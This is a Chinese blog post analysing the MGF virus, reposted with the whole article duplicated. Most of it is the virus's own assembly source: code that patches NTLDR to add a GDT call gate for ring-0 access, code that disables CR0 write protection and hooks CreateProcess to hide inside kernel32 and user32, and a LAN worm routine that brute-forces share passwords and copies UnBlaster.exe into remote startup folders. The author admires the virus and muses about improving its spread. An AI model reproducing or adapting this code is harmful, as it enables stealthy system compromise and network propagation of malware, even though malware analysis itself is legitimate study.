利用NTLDR进来RING0的方法及MGF病毒技术分析
利用NTLDR进入RING0的方法及MGF病毒技术分析
利用NTLDR进入RING0的方法及MGF病毒技术分析
2010年08月02日
以前看了莫国防病毒的源代码。摸到了一个进入RING0的方法。今天又在EST论坛看到了代码,随手写一个笔记吧。其实wowocock已经提及过这个了。我就在简单的说说,各位就别拍我了。笔记而已。。。主要要说的就是病毒进入RING0的方法,虽然现在说起来MGF病毒进入RING0的方法,已经算老技术了,但是还是有必要了解它。病毒的其他方面也简单的描述一下,有很多巧妙之处,可以说是个“好”病毒。另外在说一下,我没有具体的去跟踪调试这个病毒
先说说进入RING0吧。
现在进入ring0的方法已经又不少了,例如sinister提出的利用驱动程序进入RING0的方法,还有WebCrazy提出的用读写物理内存的方法来读写GDT所在的物理内存,在GDT上生成自己的调用门来进入ring0,还有EVA提出的方法。还可以参考 http://www.eviloctal.com/forum/read.php?tid=10933&fpage=1 (wowocock写的总结,包括利用结构化异常处理以及利用中断门的方法进入RING0)。我所要说的是莫国防病毒所采用的方法,就是在NTLDR中搜寻GDT并找个空闲的地方添加CALLGATE。
上面我门说了,莫国防病毒采用的方法是在NTLDR中搜索GDT域的空闲区,创建调用门。NTLDR就是系统的引导过程中的重要角色,主要任务就是将x86 实模式转到win2k的保护模式下,还有装载Ntbootdd.sys文件等工作(WIN2K具体引导过程请参见《Windows2000引导过程》).而其中也包括了装载GDT(全局描述符表)(装载GDT是在由实模式切换到保护模式之前的准备工作中就完成的)。也就是说,如果我们创建一个调用门,那么系统启动的时候就会将调用门装载。然后我们就可以利用这个CALLGATE来进入RING0了。
有人问过,用什么来确认NTLDR中包含有这个过程?关于这个问题,可以根据tombkeeper写的,调试NTLDR,来监视NTLDR在切换到保护模式的时候所做的一切。
下面我们来看看MGF病毒修改NTLDR添加CALLGATE的那段代码:
_dwFlag-----bit 0:0=ntldr, 1=PE;bit 1:0=mem, 1=file;
bit 2:0=auto(ansi/unicode), 1=ansi
……………………
.else;_dwFlag ;如果是NTLDR文件,写入CALLGATE
lea esi,szGdtData[ebx]
mov edi,@lpFileMap
mov ecx,@dwFileSize
@@:
inc edi
push esi
push edi
push ecx
mov ecx,10h
repz cmpsb
pop ecx
pop edi
pop esi
loopnz @b
在NTLDR中以16个字节为单位搜索RING0,CS,DS找到后EDI指向该数据的最后一个字节:说白了就是搜索GDT的特征。
.if ZERO?
xor eax,eax
mov ecx,80h
@@:
sub edi,8
push edi
push ecx
mov ecx,8
repz scasb
pop ecx
pop edi
loopnz @b
在向前的80H的范围内搜索NULL SELECTOR(8个0),其实没有必要,因为找到的SZGDTDATA前面就是了,所以最后EDI就指向NULL SELECTOR
.if ZERO?
add edi,100h
lea esi,szCallGate[ebx]
mov ecx,10h
rep movsb
在偏移100H处写入CALLGATE和自己的RING0,CS,这里有必要用自己RING0 CS,因为如果用系统的,SELECTOR虽然也可以,但在直接IO的时候有可能会出现0XE的页故障,也就是说如果加入破坏代码直接读写硬盘扇区,可能会出错。
mov edx,dwC3Address[ebx]
mov word ptr [edi-16],dx
shr edx,16
mov word ptr [edi-10],dx
使调用门指向ret的地址
.endif
.endif
dwC3Address是kernel32.dll中的地址,有人问为什么不用NTDLL.DLL中的呢?
kernel32.dll这个模块是所有程序默认加载的,而NTDLL.dll则不一样。dwC3Address是kernel32.dll中的指令ret地址。所以这个方法非常巧妙。
有些人问,为什么不用系统选择子08h所对应的描述符?
因为如果操作系统检测到描述符对应的代码和数据的地址都在0x80000000H以下运行的话,就会被认为是非法进入RING0,然后产生错误。所以我们要创建自己的描述符来保证不会出现这样的错误。
在WIN98下进入RING0用和CIH一样的技术,直接往GDT添加CALLGATE。这里就不说了。另外在2K下在修改NTLDT后需要重起才会生效。
下面来说说MGF病毒的其他部分。
来看看在RING0中,写KERNEL32和USER32的部分。
;RING0
mov eax,esp
mov esp,[esp+4] ;切换堆栈 switch to ring3 esp
push eax ;save ring0 esp
mov eax,cr0
push eax ;CR0
btr eax,16
mov cr0,eax ;去掉kernel32模块只读内存页的写保护
mov eax,lpOldPE[ebx]
mov edx,dwOldEntry[ebx]
mov [eax+28h],edx
mov edx,dwOldImage[ebx]
mov [eax+50h],edx ;恢复进程的入口和映像大小,避过某些程序的自我保护
mov edi,hKernel32[ebx]
add edi,[edi+3ch]
mov edi,[edi+54h]
add edi,hKernel32[ebx]
mov lpMemPosition1[ebx],edi
lea esi,VirusStart[ebx]
mov ecx,10h
repz cmpsb ;判断病毒是否已经在内存
.if !ZERO? ;not in mem
.if dwVersion[ebx] ;不在内存 and win9x
push 0fh
push 0
push -1
push 0
push 0
push 0
push 1
push 1
@@:
int 20h ;vxd->_PageAllocate
dd 00010053h
add esp,8*4
lea edi,@b[ebx]
mov word ptr [edi],20cdh
mov dword ptr [edi+2],00010053h
.else
mov eax,hUser32[ebx]
add eax,[eax+3ch]
mov eax,[eax+54h]
add eax,hUser32[ebx] ;2000/XP/2003---》EAX=user32.dll模块的空隙
.endif
mov lpMemPosition2[ebx],eax
mov edi,lpMemPosition1[ebx]
add edi,offset _BeforeAPI-offset VirusStart
mov dword ptr [ebx+szNewCommand+1],edi ;
构造跳转入CreateProcess拦截函数的指令,
把HOOK CREATEPROCESS的指令地址放到第一段代码的后面
mov esi,dwCreateProcess[ebx]
push esi
lea edi,szOldCommand[ebx]
mov ecx,6
rep movsb ;保存原来CreateProcess函数的前6字节
lea esi,szNewCommand[ebx]
pop edi
mov ecx,6
rep movsb ;把CreateProcess函数的第一条指令改为跳入拦截函数的指令
lea esi,VirusStart[ebx]
mov edi,lpMemPosition1[ebx]
mov ecx,VirusSizeP1
rep movsb ;病毒前3K驻留在kernel32模块
mov edi,eax
mov ecx,VirusSizeP2
rep movsb ;病毒后2K驻留在user32模块或vxd _PageAllocate分到的页中
.endif
pop eax
mov cr0,eax ;恢复CR0
pop esp
lea eax,Ring3_1[ebx]
push eax
retf ;返回RING3
Ring3_1:
.endif
病毒在kernel32.dll和user32.dll中找空隙并驻留其中。这样的话,任务管理器中就看不到病毒,更无法终止感染文件。
病毒还去除了kernel32的保护属性。这个方法当然很好。不过在退出的时候没有恢复,这样就会出问题的。在NT/2k/xp系统中,DLL所在页面被映射到进程的私有空间(如 Kernel32.dll 映射至77ED0000)中,并具有写时拷贝属性(cow),也就是说没有进程试图写入该页面时,所有进程共享这个页面;而当一个进程试图写入该页面时,系统的页面错误处理代码将收到处理器的异常,并检查到该异常并非访问违例,同时分配给引发异常的进程一个新页面,并拷贝原页面内容于其上且更新进程的页表以指向新分配的页。这种共享内存的优化给病毒来了一定的麻烦,病毒不能象在WIN9X下那样仅修改Kernel32.dll一处代码便可一劳永逸。所以说如果在9X下,这样做没有问题。而在2K和XP下是不行的。这就是2K/XP的COW机制。当然还有一种方法可以对付它,就是修改CR0的WP位,不过别忘了恢复 :)。
因为病毒要定位LoadLibraryA和GetProcAddress函数的地址。在这里病毒采用了拦截CreateProcess函数感染PE文件,也就很正常了。不过这样的感染方法还是很罕见的,与一般的病毒有所不同。可以说是MGF首创,如果以前有,就当我孤陋寡闻,尽情的拍死我吧。
下面是病毒创建的的局域网的线程
_GoLAN proc lParam
local @hEnum
local @dwcCount
local @szResourceName[32]:byte
local @szBuffer[0c00h]:byte
ret
pushad
db 0e8h,0,0,0,0
pop ebx
sub ebx,$-1
lea eax,@hEnum
push eax
push 0
push 13h
push 0
push 5
call dwWNetOpenEnum[ebx]
.if !eax
.repeat
mov @dwcCount,-1
lea eax,dwBufferSize[ebx]
push eax
lea eax,@szBuffer
push eax
lea eax,@dwcCount
push eax
push @hEnum
call dwWNetEnumResource[ebx]
cmp dword ptr [@szBuffer+14h],0
jnz @f
.until eax
push @hEnum
call dwWNetCloseEnum[ebx]
.endif
jmp _GoLANexit
@@:
push @hEnum
call dwWNetCloseEnum[ebx]
lea edi,@szBuffer
_NextPC:
push edi
mov esi,[edi+14h]
lea edi,@szResourceName
@@:
lodsb
stosb
or al,al
jnz @b
mov dword ptr [edi-1],\'C\\\'
pop edi
xor eax,eax
mov dwPassword[ebx],eax
@@:
lea edx,szLocalDrive[ebx]
push edx
push eax
lea edx,@szResourceName
push edx
call dwWNetAddConnection[ebx]
.if eax==56h
call _GenPassWord
cmp dwPassword[ebx],0
jnz @b
.elseif !eax
push 0
lea eax,szDFile[ebx]
push eax
lea eax,szSFile[ebx]
push eax
call dwCopyFile[ebx] ;如果找到可写共享,感染
mov esi,eax
push 1
lea eax,szLocalDrive[ebx]
push eax
call dwWNetCancelConnection[ebx]
call _GenPassWord
or esi,esi
jz @b
.endif
add edi,20h
dec @dwcCount
jnz _NextPC
_GoLANexit:
popad
ret
_GoLAN endp
szMemToFileName db \'UnBlaster.exe\',0
szSFile db \'c:\\windows\\system\\UnBlaster.exe\',0
szDFile db \'X:\\WINDOWS\\All Users\\Start Menu\\Programs\\
启动\\UnBlaster.exe\',0 ;
从这里可以看出,把病毒复制到远程主机的启动文件中。
dwPassword dd 0
dd 0,0
szPassword db 0
szLocalDrive db \'x:\',0
dwBufferSize dd 0c00h
_GenPassWord:;生成密码的子程序,密码包括1234567890!@#$%^字符
std
pushad
lea edi,[ebx+szPassword-1]
xor edx,edx
mov eax,dwPassword[ebx]
mov ecx,16
@@:
div ecx
xchg eax,edx
.if al=6 && al<=15
add al,2ah
.endif
stosb
xor eax,eax
xchg eax,edx
or eax,eax
jnz @b
inc edi
inc dwPassword[ebx]
mov [esp+20h-4],edi
popad
cld
ret
利用NTLDR进入RING0的方法及MGF病毒技术分析
2010年08月02日
以前看了莫国防病毒的源代码。摸到了一个进入RING0的方法。今天又在EST论坛看到了代码,随手写一个笔记吧。其实wowocock已经提及过这个了。我就在简单的说说,各位就别拍我了。笔记而已。。。主要要说的就是病毒进入RING0的方法,虽然现在说起来MGF病毒进入RING0的方法,已经算老技术了,但是还是有必要了解它。病毒的其他方面也简单的描述一下,有很多巧妙之处,可以说是个“好”病毒。另外在说一下,我没有具体的去跟踪调试这个病毒
先说说进入RING0吧。
现在进入ring0的方法已经又不少了,例如sinister提出的利用驱动程序进入RING0的方法,还有WebCrazy提出的用读写物理内存的方法来读写GDT所在的物理内存,在GDT上生成自己的调用门来进入ring0,还有EVA提出的方法。还可以参考 http://www.eviloctal.com/forum/read.php?tid=10933&fpage=1 (wowocock写的总结,包括利用结构化异常处理以及利用中断门的方法进入RING0)。我所要说的是莫国防病毒所采用的方法,就是在NTLDR中搜寻GDT并找个空闲的地方添加CALLGATE。
上面我门说了,莫国防病毒采用的方法是在NTLDR中搜索GDT域的空闲区,创建调用门。NTLDR就是系统的引导过程中的重要角色,主要任务就是将x86 实模式转到win2k的保护模式下,还有装载Ntbootdd.sys文件等工作(WIN2K具体引导过程请参见《Windows2000引导过程》).而其中也包括了装载GDT(全局描述符表)(装载GDT是在由实模式切换到保护模式之前的准备工作中就完成的)。也就是说,如果我们创建一个调用门,那么系统启动的时候就会将调用门装载。然后我们就可以利用这个CALLGATE来进入RING0了。
有人问过,用什么来确认NTLDR中包含有这个过程?关于这个问题,可以根据tombkeeper写的,调试NTLDR,来监视NTLDR在切换到保护模式的时候所做的一切。
下面我们来看看MGF病毒修改NTLDR添加CALLGATE的那段代码:
_dwFlag-----bit 0:0=ntldr, 1=PE;bit 1:0=mem, 1=file;
bit 2:0=auto(ansi/unicode), 1=ansi
……………………
.else;_dwFlag ;如果是NTLDR文件,写入CALLGATE
lea esi,szGdtData[ebx]
mov edi,@lpFileMap
mov ecx,@dwFileSize
@@:
inc edi
push esi
push edi
push ecx
mov ecx,10h
repz cmpsb
pop ecx
pop edi
pop esi
loopnz @b
在NTLDR中以16个字节为单位搜索RING0,CS,DS找到后EDI指向该数据的最后一个字节:说白了就是搜索GDT的特征。
.if ZERO?
xor eax,eax
mov ecx,80h
@@:
sub edi,8
push edi
push ecx
mov ecx,8
repz scasb
pop ecx
pop edi
loopnz @b
在向前的80H的范围内搜索NULL SELECTOR(8个0),其实没有必要,因为找到的SZGDTDATA前面就是了,所以最后EDI就指向NULL SELECTOR
.if ZERO?
add edi,100h
lea esi,szCallGate[ebx]
mov ecx,10h
rep movsb
在偏移100H处写入CALLGATE和自己的RING0,CS,这里有必要用自己RING0 CS,因为如果用系统的,SELECTOR虽然也可以,但在直接IO的时候有可能会出现0XE的页故障,也就是说如果加入破坏代码直接读写硬盘扇区,可能会出错。
mov edx,dwC3Address[ebx]
mov word ptr [edi-16],dx
shr edx,16
mov word ptr [edi-10],dx
使调用门指向ret的地址
.endif
.endif
dwC3Address是kernel32.dll中的地址,有人问为什么不用NTDLL.DLL中的呢?
kernel32.dll这个模块是所有程序默认加载的,而NTDLL.dll则不一样。dwC3Address是kernel32.dll中的指令ret地址。所以这个方法非常巧妙。
有些人问,为什么不用系统选择子08h所对应的描述符?
因为如果操作系统检测到描述符对应的代码和数据的地址都在0x80000000H以下运行的话,就会被认为是非法进入RING0,然后产生错误。所以我们要创建自己的描述符来保证不会出现这样的错误。
在WIN98下进入RING0用和CIH一样的技术,直接往GDT添加CALLGATE。这里就不说了。另外在2K下在修改NTLDT后需要重起才会生效。
下面来说说MGF病毒的其他部分。
来看看在RING0中,写KERNEL32和USER32的部分。
;RING0
mov eax,esp
mov esp,[esp+4] ;切换堆栈 switch to ring3 esp
push eax ;save ring0 esp
mov eax,cr0
push eax ;CR0
btr eax,16
mov cr0,eax ;去掉kernel32模块只读内存页的写保护
mov eax,lpOldPE[ebx]
mov edx,dwOldEntry[ebx]
mov [eax+28h],edx
mov edx,dwOldImage[ebx]
mov [eax+50h],edx ;恢复进程的入口和映像大小,避过某些程序的自我保护
mov edi,hKernel32[ebx]
add edi,[edi+3ch]
mov edi,[edi+54h]
add edi,hKernel32[ebx]
mov lpMemPosition1[ebx],edi
lea esi,VirusStart[ebx]
mov ecx,10h
repz cmpsb ;判断病毒是否已经在内存
.if !ZERO? ;not in mem
.if dwVersion[ebx] ;不在内存 and win9x
push 0fh
push 0
push -1
push 0
push 0
push 0
push 1
push 1
@@:
int 20h ;vxd->_PageAllocate
dd 00010053h
add esp,8*4
lea edi,@b[ebx]
mov word ptr [edi],20cdh
mov dword ptr [edi+2],00010053h
.else
mov eax,hUser32[ebx]
add eax,[eax+3ch]
mov eax,[eax+54h]
add eax,hUser32[ebx] ;2000/XP/2003---》EAX=user32.dll模块的空隙
.endif
mov lpMemPosition2[ebx],eax
mov edi,lpMemPosition1[ebx]
add edi,offset _BeforeAPI-offset VirusStart
mov dword ptr [ebx+szNewCommand+1],edi ;
构造跳转入CreateProcess拦截函数的指令,
把HOOK CREATEPROCESS的指令地址放到第一段代码的后面
mov esi,dwCreateProcess[ebx]
push esi
lea edi,szOldCommand[ebx]
mov ecx,6
rep movsb ;保存原来CreateProcess函数的前6字节
lea esi,szNewCommand[ebx]
pop edi
mov ecx,6
rep movsb ;把CreateProcess函数的第一条指令改为跳入拦截函数的指令
lea esi,VirusStart[ebx]
mov edi,lpMemPosition1[ebx]
mov ecx,VirusSizeP1
rep movsb ;病毒前3K驻留在kernel32模块
mov edi,eax
mov ecx,VirusSizeP2
rep movsb ;病毒后2K驻留在user32模块或vxd _PageAllocate分到的页中
.endif
pop eax
mov cr0,eax ;恢复CR0
pop esp
lea eax,Ring3_1[ebx]
push eax
retf ;返回RING3
Ring3_1:
.endif
病毒在kernel32.dll和user32.dll中找空隙并驻留其中。这样的话,任务管理器中就看不到病毒,更无法终止感染文件。
病毒还去除了kernel32的保护属性。这个方法当然很好。不过在退出的时候没有恢复,这样就会出问题的。在NT/2k/xp系统中,DLL所在页面被映射到进程的私有空间(如 Kernel32.dll 映射至77ED0000)中,并具有写时拷贝属性(cow),也就是说没有进程试图写入该页面时,所有进程共享这个页面;而当一个进程试图写入该页面时,系统的页面错误处理代码将收到处理器的异常,并检查到该异常并非访问违例,同时分配给引发异常的进程一个新页面,并拷贝原页面内容于其上且更新进程的页表以指向新分配的页。这种共享内存的优化给病毒来了一定的麻烦,病毒不能象在WIN9X下那样仅修改Kernel32.dll一处代码便可一劳永逸。所以说如果在9X下,这样做没有问题。而在2K和XP下是不行的。这就是2K/XP的COW机制。当然还有一种方法可以对付它,就是修改CR0的WP位,不过别忘了恢复 :)。
因为病毒要定位LoadLibraryA和GetProcAddress函数的地址。在这里病毒采用了拦截CreateProcess函数感染PE文件,也就很正常了。不过这样的感染方法还是很罕见的,与一般的病毒有所不同。可以说是MGF首创,如果以前有,就当我孤陋寡闻,尽情的拍死我吧。
下面是病毒创建的的局域网的线程
_GoLAN proc lParam
local @hEnum
local @dwcCount
local @szResourceName[32]:byte
local @szBuffer[0c00h]:byte
ret
pushad
db 0e8h,0,0,0,0
pop ebx
sub ebx,$-1
lea eax,@hEnum
push eax
push 0
push 13h
push 0
push 5
call dwWNetOpenEnum[ebx]
.if !eax
.repeat
mov @dwcCount,-1
lea eax,dwBufferSize[ebx]
push eax
lea eax,@szBuffer
push eax
lea eax,@dwcCount
push eax
push @hEnum
call dwWNetEnumResource[ebx]
cmp dword ptr [@szBuffer+14h],0
jnz @f
.until eax
push @hEnum
call dwWNetCloseEnum[ebx]
.endif
jmp _GoLANexit
@@:
push @hEnum
call dwWNetCloseEnum[ebx]
lea edi,@szBuffer
_NextPC:
push edi
mov esi,[edi+14h]
lea edi,@szResourceName
@@:
lodsb
stosb
or al,al
jnz @b
mov dword ptr [edi-1],\'C\\\'
pop edi
xor eax,eax
mov dwPassword[ebx],eax
@@:
lea edx,szLocalDrive[ebx]
push edx
push eax
lea edx,@szResourceName
push edx
call dwWNetAddConnection[ebx]
.if eax==56h
call _GenPassWord
cmp dwPassword[ebx],0
jnz @b
.elseif !eax
push 0
lea eax,szDFile[ebx]
push eax
lea eax,szSFile[ebx]
push eax
call dwCopyFile[ebx] ;如果找到可写共享,感染
mov esi,eax
push 1
lea eax,szLocalDrive[ebx]
push eax
call dwWNetCancelConnection[ebx]
call _GenPassWord
or esi,esi
jz @b
.endif
add edi,20h
dec @dwcCount
jnz _NextPC
_GoLANexit:
popad
ret
_GoLAN endp
szMemToFileName db \'UnBlaster.exe\',0
szSFile db \'c:\\windows\\system\\UnBlaster.exe\',0
szDFile db \'X:\\WINDOWS\\All Users\\Start Menu\\Programs\\
启动\\UnBlaster.exe\',0 ;
从这里可以看出,把病毒复制到远程主机的启动文件中。
dwPassword dd 0
dd 0,0
szPassword db 0
szLocalDrive db \'x:\',0
dwBufferSize dd 0c00h
_GenPassWord:;生成密码的子程序,密码包括1234567890!@#$%^字符
std
pushad
lea edi,[ebx+szPassword-1]
xor edx,edx
mov eax,dwPassword[ebx]
mov ecx,16
@@:
div ecx
xchg eax,edx
.if al=6 && al<=15
add al,2ah
.endif
stosb
xor eax,eax
xchg eax,edx
or eax,eax
jnz @b
inc edi
inc dwPassword[ebx]
mov [esp+20h-4],edi
popad
cld
ret
病毒在局域网传播方面就是靠破解远程主机共享密码(密码由病毒生成),把病毒复制到目标机器的启动文件夹中。当目标重起后病毒开始感染。我想如果在优化一下传播方式的话……
上文来自:http://www.myexception.cn/other/659716.html